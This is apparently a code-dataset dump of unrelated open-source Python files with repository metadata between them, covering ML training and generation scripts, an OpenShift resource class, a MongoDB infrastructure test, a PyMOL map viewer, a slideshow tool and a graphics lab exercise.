model = Model(stackedgru, optimizer, model_path='./phaselink_model')
print("Begin training process.")
model.train(train_loader, val_loader, n_epochs, enable_amp=enable_amp)
# And select and assign best model:
find_best_model(model_path="phaselink_model")
print("Finished.")
| 37.121359
| 140
| 0.55172
|
9ce6c2eca44ea0e93c8984d72cabb25135bde838
| 1,329
|
py
|
Python
|
simple.py
|
agermanidis/attngan
|
5e763da632a307be28656573b69b28d234eb6d99
|
[
"MIT"
] | 1
|
2020-08-16T10:07:06.000Z
|
2020-08-16T10:07:06.000Z
|
simple.py
|
agermanidis/attngan
|
5e763da632a307be28656573b69b28d234eb6d99
|
[
"MIT"
] | 2
|
2020-07-23T19:25:43.000Z
|
2020-07-24T21:21:08.000Z
|
simple.py
|
agermanidis/attngan
|
5e763da632a307be28656573b69b28d234eb6d99
|
[
"MIT"
] | 1
|
2020-07-22T18:26:37.000Z
|
2020-07-22T18:26:37.000Z
|
import os
import argparse
import time
import random
from eval import *
from miscc.config import cfg, cfg_from_file
import warnings
warnings.filterwarnings("ignore")
def parse_args():
parser = argparse.ArgumentParser(description='Train a AttnGAN network')
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default='cfg/bird_attn2.yml', type=str)
parser.add_argument('--gpu', dest='gpu_id', type=int, default=-1)
parser.add_argument('--data_dir', dest='data_dir', type=str, default='')
parser.add_argument('--manualSeed', type=int, help='manual seed')
args = parser.parse_args()
return args
if __name__ == '__main__':
print('Running Simple Inference')
# gpu based
args = parse_args()
cfg_from_file(args.cfg_file)
cfg.CUDA = True
# load word dictionaries
wordtoix, ixtoword = word_index()
# load models
print('Loading Model...')
text_encoder, netG = models(len(wordtoix))
print('Models Loaded')
seed = 100
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if cfg.CUDA:
torch.cuda.manual_seed_all(seed)
caption = 'a green field with trees and mountain in the back'
im = generate(caption, wordtoix, ixtoword, text_encoder, netG, False)
name = 'RESULT.png'
im.save(name, format="png")
print('Done!')
| 30.204545
| 73
| 0.702032
|
c27d78b2c00680c6ead601a6304b59698de7cbcb
| 2,870
|
py
|
Python
|
ocp_resources/catalog_source_config.py
|
mguetta1/openshift-python-wrapper
|
007ff36aab0f9f87c672db6107a2dd5b5618613b
|
[
"Apache-2.0"
] | null | null | null |
ocp_resources/catalog_source_config.py
|
mguetta1/openshift-python-wrapper
|
007ff36aab0f9f87c672db6107a2dd5b5618613b
|
[
"Apache-2.0"
] | null | null | null |
ocp_resources/catalog_source_config.py
|
mguetta1/openshift-python-wrapper
|
007ff36aab0f9f87c672db6107a2dd5b5618613b
|
[
"Apache-2.0"
] | null | null | null |
import logging
from ocp_resources.constants import PROTOCOL_ERROR_EXCEPTION_DICT, TIMEOUT_4MINUTES
from ocp_resources.resource import NamespacedResource
from ocp_resources.utils import TimeoutExpiredError, TimeoutSampler
LOGGER = logging.getLogger(__name__)
class CatalogSourceConfig(NamespacedResource):
api_group = NamespacedResource.ApiGroup.OPERATORS_COREOS_COM
def __init__(
self,
name=None,
namespace=None,
source=None,
target_namespace=None,
packages=None,
cs_display_name=None,
cs_publisher=None,
client=None,
teardown=True,
yaml_file=None,
delete_timeout=TIMEOUT_4MINUTES,
):
super().__init__(
name=name,
namespace=namespace,
client=client,
teardown=teardown,
yaml_file=yaml_file,
delete_timeout=delete_timeout,
)
self.source = source
self.target_namespace = target_namespace
self.packages = packages
self.cs_display_name = cs_display_name
self.cs_publisher = cs_publisher
def to_dict(self):
res = super().to_dict()
if self.yaml_file:
return res
res.update(
{
"spec": {
"source": self.source,
"targetNamespace": self.target_namespace,
"packages": self.packages,
"csDisplayName": self.cs_display_name,
"csPublisher": self.cs_publisher,
}
}
)
return res
def wait_for_csc_status(self, status, timeout=120):
"""
Wait for CatalogSourceConfig to reach requested status.
CatalogSourceConfig Status is found under currentPhase.phase.
Example phase: {'message': 'The object has been successfully reconciled', 'name': 'Succeeded'}
Raises:
TimeoutExpiredError: If CatalogSourceConfig in not in desire status.
"""
samples = TimeoutSampler(
wait_timeout=timeout,
sleep=1,
exceptions_dict=PROTOCOL_ERROR_EXCEPTION_DICT,
func=self.api.get,
field_selector=f"metadata.name=={self.name}",
namespace=self.namespace,
)
current_status = None
try:
for sample in samples:
if sample.items:
sample_status = sample.items[0].status
if sample_status:
current_status = sample_status.currentPhase.phase["name"]
if current_status == status:
return
except TimeoutExpiredError:
if current_status:
LOGGER.error(f"Status of {self.kind} {self.name} is {current_status}")
raise
| 31.195652
| 102
| 0.581533
|
651767a2c488e43b3d6628767c855d37a8fc21db
| 4,679
|
py
|
Python
|
generate.py
|
mangtronix/samplernn-pytorch
|
101d618f82fcb1ff48914297107eb87a822f3f5e
|
[
"MIT"
] | 1
|
2020-11-19T08:32:07.000Z
|
2020-11-19T08:32:07.000Z
|
generate.py
|
mangtronix/samplernn-pytorch
|
101d618f82fcb1ff48914297107eb87a822f3f5e
|
[
"MIT"
] | null | null | null |
generate.py
|
mangtronix/samplernn-pytorch
|
101d618f82fcb1ff48914297107eb87a822f3f5e
|
[
"MIT"
] | null | null | null |
from model import SampleRNN
import torch
from collections import OrderedDict
import os
import json
from trainer.plugins import GeneratorPlugin
import glob
import sys
'''Other comments: https://github.com/deepsound-project/samplernn-pytorch/issues/8'''
# Support some command line options
# Added by Mangtronix
# Michael Ang - https://michaelang.com
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-d', '--dataset', help="Dataset name, e.g. 'lofi'")
parser.add_option('-l', '--length', help="Length of audio to generate in seconds", default=30)
parser.add_option('-c', '--checkpoint', help="Checkpoint name ('latest','best', or explicit name)", default='latest')
parser.add_option('-o', '--output', help="Output file name")
(options, args) = parser.parse_args()
if not options.dataset:
parser.print_help()
sys.exit(-1)
def find_results_path(dataset_name):
paths = glob.glob('results/*' + dataset_name)
if len(paths) < 1:
print("No results found for " + dataset_name)
raise("dataset not found")
return paths[0] + '/'
def find_latest_checkpoint(results_path):
files = glob.glob(results_path + "checkpoints/*")
latest_file = max(files, key=os.path.getctime)
return latest_file
def find_best_checkpoint(results_path):
files = glob.glob(results_path + "checkpoints/best*")
return files[-1]
def find_checkpoint(results_path, checkpoint_name):
if checkpoint_name == 'best':
return find_best_checkpoint(results_path)
if checkpoint_name == 'latest':
return find_latest_checkpoint(results_path)
return results_path + "checkpoints/" + checkpoint_name
def get_checkpoint_name(checkpoint_path):
return os.path.basename(os.path.normpath(checkpoint_path))
RESULTS_PATH=find_results_path(options.dataset)
print("Using dataset at %s" % RESULTS_PATH)
PRETRAINED_PATH = find_checkpoint(RESULTS_PATH, options.checkpoint)
print("Using checkpoint %s" % PRETRAINED_PATH)
CHECKPOINT_NAME = get_checkpoint_name(PRETRAINED_PATH)
print("Checkpoint name is %s" % CHECKPOINT_NAME)
OUTPUT_NAME = options.dataset + "_" + CHECKPOINT_NAME
# Paths
#RESULTS_PATH = 'results/exp:TEST-frame_sizes:16,4-n_rnn:2-dataset:COGNIMUSE_eq_eq_pad/'
#RESULTS_PATH = 'results/exp:lofi-frame_sizes:16,4-n_rnn:2-dataset:lofi/'
#PRETRAINED_PATH = RESULTS_PATH + 'checkpoints/best-ep11-it2750'
#PRETRAINED_PATH = RESULTS_PATH + 'checkpoints/best-ep65-it79431'
# RESULTS_PATH = 'results/exp:TEST-frame_sizes:16,4-n_rnn:2-dataset:piano3/'
# PRETRAINED_PATH = RESULTS_PATH + 'checkpoints/best-ep21-it29610'
GENERATED_PATH = RESULTS_PATH + 'generated/'
if not os.path.exists(GENERATED_PATH):
os.mkdir(GENERATED_PATH)
# Load model parameters from .json for audio generation
params_path = RESULTS_PATH + 'sample_rnn_params.json'
with open(params_path, 'r') as fp:
params = json.load(fp)
# Create model with same parameters as used in training
model = SampleRNN(
frame_sizes=params['frame_sizes'],
n_rnn=params['n_rnn'],
dim=params['dim'],
learn_h0=params['learn_h0'],
q_levels=params['q_levels'],
weight_norm=params['weight_norm']
)
#model = model.cuda()
# Delete "model." from key names since loading the checkpoint automatically attaches it to the key names
pretrained_state = torch.load(PRETRAINED_PATH)
new_pretrained_state = OrderedDict()
for k, v in pretrained_state.items():
layer_name = k.replace("model.", "")
new_pretrained_state[layer_name] = v
# print("k: {}, layer_name: {}, v: {}".format(k, layer_name, np.shape(v)))
# Load pretrained model
model.load_state_dict(new_pretrained_state)
# Generate Plugin
num_samples = 1 # params['n_samples']
sample_length = params['sample_length']
sample_rate = params['sample_rate']
sampling_temperature = params['sampling_temperature']
# Override from our options
sample_length = sample_rate * int(options.length)
print("Number samples: {}, sample_length: {}, sample_rate: {}".format(num_samples, sample_length, sample_rate))
print("Generating %d seconds of audio" % (sample_length / sample_rate))
generator = GeneratorPlugin(GENERATED_PATH, num_samples, sample_length, sample_rate, sampling_temperature)
# Call new register function to accept the trained model and the cuda setting
generator.register_generate(model.cuda(), params['cuda'])
# Generate new audio
# $$$ check if we already have generated audio and increment the file name
generator.epoch(OUTPUT_NAME)
GENERATED_FILEPATH = GENERATED_PATH + "ep" + OUTPUT_NAME + "-s1.wav"
print("Saved audio to %s " % GENERATED_FILEPATH)
if options.output:
print("Moving to %s" % options.output)
os.rename(GENERATED_FILEPATH, options.output)
| 35.44697
| 117
| 0.748664
|
5bf4a6a344dff56744e26cdc8b43558e9ab4afbf
| 3,504
|
py
|
Python
|
lab6/lab6.py
|
sydneysmartin/csc121
|
6ef4d323f58f4177c46b5ea38db7bc95a06d865e
|
[
"CC0-1.0"
] | null | null | null |
lab6/lab6.py
|
sydneysmartin/csc121
|
6ef4d323f58f4177c46b5ea38db7bc95a06d865e
|
[
"CC0-1.0"
] | null | null | null |
lab6/lab6.py
|
sydneysmartin/csc121
|
6ef4d323f58f4177c46b5ea38db7bc95a06d865e
|
[
"CC0-1.0"
] | null | null | null |
import arcade
def draw_section_outlines():
color = arcade.color.BLACK
# Draw squares on bottom
arcade.draw_rectangle_outline(150, 150, 300, 300, color)
arcade.draw_rectangle_outline(450, 150, 300, 300, color)
arcade.draw_rectangle_outline(750, 150, 300, 300, color)
arcade.draw_rectangle_outline(1050, 150, 300, 300, color)
#Draw squares on top
arcade.draw_rectangle_outline(150, 450, 300, 300, color)
arcade.draw_rectangle_outline(450, 450, 300, 300, color)
arcade.draw_rectangle_outline(750, 450, 300, 300, color)
arcade.draw_rectangle_outline(1050, 450, 300, 300, color)
def draw_section_1():
for row in range(30):
for column in range(30):
x = (column * 10) + 5
y = (row *10) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def draw_section_2():
for row in range(30):
for column in range(30):
x = 300 + (10 * column) + 5
y = (10 * row) + 5
if row % 2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
def draw_section_3():
for row in range (30):
for column in range(30):
x = 600 + (10 * column) + 5
y = (10 * row) + 5
if column % 2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
def draw_section_4():
for row in range (30):
for column in range(30):
x = 900 + (10 * row) + 5
y = (10 * column) + 5
if row % 2 == 1 or column % 2 == 1:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
elif row %2 == 0 and column%2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
def draw_section_5():
for column in range (30):
for row in range(column):
x = (10 * column) + 5
y = 300 + (10 * row) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def draw_section_6():
for row in range(30):
for column in range(30-row):
x = 300 + (10 * column) + 5
y = 300 + (10 * row) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def draw_section_7():
for row in range(30):
for column in range(row + 1):
x = 600 + (10 * column) + 5
y = 300 + (10 * row) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def draw_section_8():
for row in range(30):
for column in range(row):
x = 1200 + (column * (-10)) - 5
y = 300 + (10 * row) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def main():
arcade.open_window(1200, 600, "Lab 05 - Loopy Lab")
arcade.set_background_color(arcade.color.AIR_FORCE_BLUE)
arcade.start_render()
draw_section_outlines
draw_section_1()
draw_section_2()
draw_section_3()
draw_section_4()
draw_section_5()
draw_section_6()
draw_section_7()
draw_section_8()
arcade.finish_render()
arcade.run()
if __name__ =='__main__':
main()
| 25.955556
| 76
| 0.558505
|
c448f209646c66de5b815220e02f7f72ed85814d
| 636
|
py
|
Python
|
ansible/roles/db/molecule/default/tests/test_default.py
|
otus-devops-2019-02/artem198315_infra
|
1d052b8c2d15b0b1a69d863de1636c630a4bfde7
|
[
"MIT"
] | null | null | null |
ansible/roles/db/molecule/default/tests/test_default.py
|
otus-devops-2019-02/artem198315_infra
|
1d052b8c2d15b0b1a69d863de1636c630a4bfde7
|
[
"MIT"
] | null | null | null |
ansible/roles/db/molecule/default/tests/test_default.py
|
otus-devops-2019-02/artem198315_infra
|
1d052b8c2d15b0b1a69d863de1636c630a4bfde7
|
[
"MIT"
] | null | null | null |
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
# check if MongoDB is enabled and running
def test_mongo_running_and_enabled(host):
mongo = host.service("mongod")
assert mongo.is_running
assert mongo.is_enabled
# check if configuration file contains the required line
def test_config_file(host):
config_file = host.file('/etc/mongod.conf')
assert config_file.contains('bindIp: 0.0.0.0')
assert config_file.is_file
def test_socket(host):
assert host.socket('tcp://0.0.0.0:27017').is_listening
| 27.652174
| 63
| 0.778302
|
1a609df3e11235af02c9be0ee1eb1221e1c146a8
| 7,334
|
py
|
Python
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Tools/Show.py
|
sparkslabs/kamaelia_orig
|
24b5f855a63421a1f7c6c7a35a7f4629ed955316
|
[
"Apache-2.0"
] | 12
|
2015-10-20T10:22:01.000Z
|
2021-07-19T10:09:44.000Z
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Tools/Show.py
|
sparkslabs/kamaelia_orig
|
24b5f855a63421a1f7c6c7a35a7f4629ed955316
|
[
"Apache-2.0"
] | 2
|
2015-10-20T10:22:55.000Z
|
2017-02-13T11:05:25.000Z
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Tools/Show.py
|
sparkslabs/kamaelia_orig
|
24b5f855a63421a1f7c6c7a35a7f4629ed955316
|
[
"Apache-2.0"
] | 6
|
2015-03-09T12:51:59.000Z
|
2020-03-01T13:06:21.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
import os
import sys
import pygame
import Axon
from Kamaelia.UI.Pygame.Button import Button
from Kamaelia.UI.Pygame.Multiclick import Multiclick
from Kamaelia.UI.Pygame.Image import Image
from Kamaelia.Visualisation.PhysicsGraph.chunks_to_lines import chunks_to_lines
from Kamaelia.Visualisation.PhysicsGraph.lines_to_tokenlists import lines_to_tokenlists
from Kamaelia.Visualisation.PhysicsGraph.TopologyViewer import TopologyViewer
from Kamaelia.Util.Chooser import Chooser
from Kamaelia.Chassis.Graphline import Graphline
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.File.ReadFileAdaptor import ReadFileAdaptor
from Kamaelia.UI.Pygame.KeyEvent import KeyEvent
# We should start thinking about how we handle the lines below better:
from Kamaelia.Apps.Show.GraphSlides import onDemandGraphFileParser_Prefab
if len(sys.argv) > 1:
basepath = sys.argv[1]
else:
basepath = "WhatIsShow.show"
GraphsFile = os.path.join(basepath, "Graphs.xml")
path = os.path.join(basepath, "Slides")
path_extra = os.path.join(basepath, "SecondarySlides")
extn = ".png"
def getSlideList(path, extn):
files = os.listdir(path)
files = [ os.path.join(path,fname) for fname in files if fname[-len(extn):]==extn ]
files.sort()
return files
PrimarySlides = getSlideList(path, extn)
SecondarySlides = getSlideList(path_extra, extn)
class BounceRange(Axon.Component.component):
def __init__(self, start, stop, step=1):
super(BounceRange, self).__init__()
self.start = start
self.stop = stop
self.step = step
def main(self):
while 1:
yield 1
if self.dataReady("inbox"):
message = self.recv("inbox")
if message == "TOGGLE":
last = None
for level in xrange(self.start, self.stop, self.step):
self.send(level, "outbox")
last = level
yield 1
if last != self.stop: # xrange can finish before reaching the end of the range.
self.send(self.stop, "outbox")
yield 1
self.start, self.stop, self.step = self.stop, self.start, -self.step
else:
self.pause()
yield 1
print """
Kamaelia: Show - Controls
=========================
General:
Fullscreen: f
Quit : q
Primary Slides:
next slide : <right click>, spacebar
prev slide : <middle click>, backspace
Fade in/out : g
Secondary Slides:
next slide : return
Fade in/out : j
Graph Slides:
next slide : page down
drag blobs : left click
Fade in/out : h
"""
Graphline(
KEYS = KeyEvent(outboxes = { "primaryslidefadesignal" : "Normal place for message",
"graphfadesignal" : "Normal place for message",
"secondaryslidefadesignal" : "Normal place for message",
"graphcontrol" : "Sends a 'next' message to the slide control",
"primaryslidecontrol" : "Keyboard control",
"secondaryslidecontrol" : "Keyboard control",
},
key_events = {
pygame.K_g: ("TOGGLE", "primaryslidefadesignal"), # Toggle Fade
pygame.K_h: ("TOGGLE", "graphfadesignal"), # Toggle Fade
pygame.K_j: ("TOGGLE", "secondaryslidefadesignal"), # Toggle Fade
pygame.K_PAGEDOWN: ("NEXT", "graphcontrol"), # Advance "graph slides"
pygame.K_RETURN: ("NEXT", "secondaryslidecontrol"), # Advance slides
pygame.K_SPACE: ("NEXT", "primaryslidecontrol"), # Advance slides
pygame.K_BACKSPACE: ("PREV", "slidecontrol"), # Advance slides
}),
MOUSECLICKS = Multiclick(caption="", position=(50,50), transparent=True,
msgs = [ "", "", "PREV", "NEXT", "PREV","NEXT" ],
size=(700,500)),
PRIMARYSLIDES = Chooser(items = PrimarySlides),
PRIMARYDISPLAYFADER = BounceRange(255,0, -10), # Initially we want to fade
PRIMARYDISPLAY = Image(size=(800,600),
position=(0,0),
displayExtra={ "transparency" : (255,255,255) },
),
SECONDARYSLIDES = Chooser(items = SecondarySlides),
SECONDARYDISPLAYFADER = BounceRange(255,0, -10), # Initially we want to fade
SECONDARYDISPLAY = Image(size=(800,600),
position=(0,0),
displayExtra={ "transparency" : (255,255,255) },
),
GRAPHSLIDES = Pipeline(
onDemandGraphFileParser_Prefab(GraphsFile),
chunks_to_lines(),
lines_to_tokenlists(),
),
GRAPHFADER = BounceRange(255,0, -10), # Initially we want to fade
GRAPHVIEWER = TopologyViewer(transparency = (255,255,255), showGrid = False, position=(0,0)),
linkages = {
("MOUSECLICKS","outbox"): ("PRIMARYSLIDES","inbox"),
("MOUSECLICKS","signal"): ("PRIMARYSLIDES","control"),
("KEYS", "primaryslidecontrol"): ("PRIMARYSLIDES","inbox"),
("KEYS", "secondaryslidecontrol"): ("SECONDARYSLIDES","inbox"),
("KEYS", "primaryslidefadesignal") : ("PRIMARYDISPLAYFADER", "inbox"),
("KEYS", "secondaryslidefadesignal") : ("SECONDARYDISPLAYFADER", "inbox"),
("KEYS", "graphfadesignal") : ("GRAPHFADER", "inbox"),
("KEYS", "graphcontrol") : ("GRAPHSLIDES", "inbox"),
("SECONDARYDISPLAYFADER", "outbox") : ("SECONDARYDISPLAY", "alphacontrol"),
("PRIMARYDISPLAYFADER", "outbox") : ("PRIMARYDISPLAY", "alphacontrol"),
("GRAPHFADER", "outbox") : ("GRAPHVIEWER", "alphacontrol"),
("SECONDARYSLIDES","outbox"): ("SECONDARYDISPLAY","inbox"),
("SECONDARYSLIDES","signal"): ("SECONDARYDISPLAY","control"),
("PRIMARYSLIDES","outbox"): ("PRIMARYDISPLAY","inbox"),
("PRIMARYSLIDES","signal"): ("PRIMARYDISPLAY","control"),
("GRAPHSLIDES","outbox"): ("GRAPHVIEWER","inbox"),
("GRAPHSLIDES","signal"): ("GRAPHVIEWER","control"),
}
).run()
| 40.076503
| 105
| 0.591083
|
35417c082a86d1a7d1d2dddb190b68d3c9d55b4f
| 2,381
|
py
|
Python
|
src/evaluate.py
|
swapnilpote/Natural-Language-Processing-with-Disaster-Tweets
|
bf4d911dd0b72cc37662e8bb756615a1fb2f1f83
|
[
"MIT"
] | null | null | null |
src/evaluate.py
|
swapnilpote/Natural-Language-Processing-with-Disaster-Tweets
|
bf4d911dd0b72cc37662e8bb756615a1fb2f1f83
|
[
"MIT"
] | null | null | null |
src/evaluate.py
|
swapnilpote/Natural-Language-Processing-with-Disaster-Tweets
|
bf4d911dd0b72cc37662e8bb756615a1fb2f1f83
|
[
"MIT"
] | null | null | null |
import os
import sys
import json
import math
# Data Science imports
import joblib
import pandas as pd
import sklearn.metrics as metrics
if len(sys.argv) != 7:
sys.stderr.write("Arguments error. Usage:\n")
sys.stderr.write("\tpython evaluate.py model prepared features scores prc roc\n")
sys.exit(1)
model_file = sys.argv[1]
in_prep_file = os.path.join(sys.argv[2], "valid.csv")
in_feat_file = os.path.join(sys.argv[3], "valid.pkl")
scores_file = sys.argv[4]
prc_file = sys.argv[5]
roc_file = sys.argv[6]
def model_score(in_prep_path: str, in_feat_path: str, model_file_path: str) -> None:
"""Perform model evaluation on validation/hold out data to check accuracy.
Args:
in_prep_path (str): Prepared data file to extract labels.
in_feat_path (str): Featurized data file to extract numpy array.
model_file_path (str): Model file path.
"""
with open(model_file_path, "rb") as f:
model = joblib.load(f)
with open(in_feat_path, "rb") as f:
X = joblib.load(f)
df = pd.read_csv(in_prep_path)
y = df["target"].values
predictions = model.predict(X)
precision, recall, prc_thresholds = metrics.precision_recall_curve(y, predictions)
fpr, tpr, roc_thresholds = metrics.roc_curve(y, predictions)
avg_prec = metrics.average_precision_score(y, predictions)
roc_auc = metrics.roc_auc_score(y, predictions)
with open(scores_file, "w") as fd:
json.dump({"avg_prec": avg_prec, "roc_auc": roc_auc}, fd, indent=4)
nth_point = math.ceil(len(prc_thresholds) / 1000)
prc_points = list(zip(precision, recall, prc_thresholds))[::nth_point]
with open(prc_file, "w") as fd:
json.dump(
{
"prc": [
{"precision": float(p), "recall": float(r), "threshold": float(t)}
for p, r, t in prc_points
]
},
fd,
indent=4,
)
with open(roc_file, "w") as fd:
json.dump(
{
"roc": [
{"fpr": float(fp), "tpr": float(tp), "threshold": float(t)}
for fp, tp, t in zip(fpr, tpr, roc_thresholds)
]
},
fd,
indent=4,
)
return None
if __name__ == "__main__":
model_score(in_prep_file, in_feat_file, model_file)
| 28.686747
| 86
| 0.602268
|
aea2a052a500e2fc0462ae1d996c1238f954bfe2
| 2,618
|
py
|
Python
|
cctbx/examples/view_fft_map.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
cctbx/examples/view_fft_map.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
cctbx/examples/view_fft_map.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
"""
Loads the file map_coeff.pickle (see random_f_calc.py) and displays
the FFT map based on these coefficients in PyMOL. Also computes
and displays a list of peaks in the map.
Usage:
Setup the cctbx environment (e.g. source setpaths.csh) and
launch PyMOL from the command line. Inside PyMOL enter:
run view_fft_map.py
show_fft()
"""
from __future__ import division
print "Loading module:", __name__
# cctbx imports
from cctbx import maptbx
from libtbx import easy_pickle
# PyMOL imports
from chempy.map import Map
from pymol import cmd
from pymol import cgo
def show_map(unit_cell, map_covering_unit_cell, label, level):
map_grid = map_covering_unit_cell.focus()
print "map_grid:", map_grid
ucell_params = unit_cell.parameters()
first = [0,0,0]
last = [map_grid[i] + 1 for i in xrange(3)]
c_obj_map = maptbx.as_CObjectZYX(
map_unit_cell=map_covering_unit_cell,
first=first,
last=last,
apply_sigma_scaling=True)
map=Map()
map.from_c_object(c_obj_map,'CObjectZYXfloat',
ucell_params[0:3], ucell_params[3:6],
list(map_grid), first, last)
cmd.load_map(map, label+"_cell")
print "map loaded into PyMol"
cmd.isomesh(label+"_con", label+"_cell", level) # create mesh
cmd.color('gray', label+"_cell") # color wire frame
cmd.set('auto_zoom', '0') # disable zooming
cmd.set('ortho', '1') # orthoscopic projects
cmd.enable(label+"_cell") # put box around map object
cmd.color('cyan', label+"_con") # color mesh
def show_peaks(unit_cell, clusters, radius=2.0):
go = []
go.extend([cgo.COLOR, 1, 0, 0,])
height0 = None
for site,height in zip(clusters.sites(), clusters.heights()):
print "%8.5f %8.5f %8.5f" % site, height
if (height0 == None): height0 = height
go.extend( [cgo.SPHERE]
+ list(unit_cell.orthogonalize(site))
+ [radius*height/height0])
cmd.load_cgo(go, "peaks")
def show_fft(file="map_coeff.pickle", map_level=3.0):
cmd.delete("all")
map_coeff = easy_pickle.load(file)
map_coeff.show_summary()
fft_map = map_coeff.fft_map(
symmetry_flags=maptbx.use_space_group_symmetry)
print "map gridding:", fft_map.n_real()
show_map(fft_map.unit_cell(), fft_map.real_map(), "fft_map", map_level)
clusters = fft_map.tags().peak_search(
parameters=maptbx.peak_search_parameters(
min_distance_sym_equiv=3.0,
max_clusters=10),
map=fft_map.real_map()).all()
show_peaks(fft_map.unit_cell(), clusters)
cmd.zoom('all', 15.0) # zoom with additional border of 15 Ang.
print
if (__name__ == "pymol"):
cmd.extend("show_fft", show_fft)
| 31.926829
| 73
| 0.698243
|
0059d567259408bd834bd3770c7532f957c7aad6
| 1,051
|
py
|
Python
|
test/test_alert_rule_response.py
|
sematext/sematext-api-client-python
|
16e025cd3d32aa58deb70fc5930ae4165afebe97
|
[
"Apache-2.0"
] | 1
|
2020-05-01T12:15:52.000Z
|
2020-05-01T12:15:52.000Z
|
test/test_alert_rule_response.py
|
sematext/sematext-api-client-python
|
16e025cd3d32aa58deb70fc5930ae4165afebe97
|
[
"Apache-2.0"
] | null | null | null |
test/test_alert_rule_response.py
|
sematext/sematext-api-client-python
|
16e025cd3d32aa58deb70fc5930ae4165afebe97
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Sematext Cloud API
API Explorer provides access and documentation for Sematext REST API. The REST API requires the API Key to be sent as part of `Authorization` header. E.g.: `Authorization : apiKey e5f18450-205a-48eb-8589-7d49edaea813`. # noqa: E501
OpenAPI spec version: v3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import stcloud
from stcloud.models.alert_rule_response import AlertRuleResponse # noqa: E501
from stcloud.rest import ApiException
class TestAlertRuleResponse(unittest.TestCase):
"""AlertRuleResponse unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testAlertRuleResponse(self):
"""Test AlertRuleResponse"""
# FIXME: construct object with mandatory attributes with example values
# model = stcloud.models.alert_rule_response.AlertRuleResponse() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 26.275
| 236
| 0.717412
|
bc20fdc0e49b57e07802369152a7c9966062cc73
| 88
|
py
|
Python
|
redditclone/posts/apps.py
|
DSanzh/the-ultimate-beginners-guide-to-django
|
2117db3b53334677ea3cf308a94f830cfc223633
|
[
"MIT"
] | null | null | null |
redditclone/posts/apps.py
|
DSanzh/the-ultimate-beginners-guide-to-django
|
2117db3b53334677ea3cf308a94f830cfc223633
|
[
"MIT"
] | null | null | null |
redditclone/posts/apps.py
|
DSanzh/the-ultimate-beginners-guide-to-django
|
2117db3b53334677ea3cf308a94f830cfc223633
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class AccountsConfig(AppConfig):
name = 'posts'
| 14.666667
| 33
| 0.75
|
f0d6cdd955df1bfd79cb2c9ecda618574dd19e99
| 7,281
|
py
|
Python
|
rlzoo/algorithms/ac/ac.py
|
CaltechExperimentalGravity/RLzoo
|
355ed45adf69015643532340affef1c2696dd6db
|
[
"Apache-2.0"
] | null | null | null |
rlzoo/algorithms/ac/ac.py
|
CaltechExperimentalGravity/RLzoo
|
355ed45adf69015643532340affef1c2696dd6db
|
[
"Apache-2.0"
] | null | null | null |
rlzoo/algorithms/ac/ac.py
|
CaltechExperimentalGravity/RLzoo
|
355ed45adf69015643532340affef1c2696dd6db
|
[
"Apache-2.0"
] | null | null | null |
"""
Actor-Critic
-------------
It uses TD-error as the Advantage.
Actor Critic History
----------------------
A3C > DDPG > AC
Advantage
----------
AC converge faster than Policy Gradient.
Disadvantage (IMPORTANT)
------------------------
The Policy is oscillated (difficult to converge), DDPG can solve
this problem using advantage of DQN.
Reference
----------
paper: https://papers.nips.cc/paper/1786-actor-critic-algorithms.pdf
View more on MorvanZhou's tutorial page: https://morvanzhou.github.io/tutorials/
MorvanZhou's code: https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/
Environment
------------
CartPole-v0: https://gym.openai.com/envs/CartPole-v0
A pole is attached by an un-actuated joint to a cart, which moves along a
frictionless track. The system is controlled by applying a force of +1 or -1
to the cart. The pendulum starts upright, and the goal is to prevent it from
falling over.
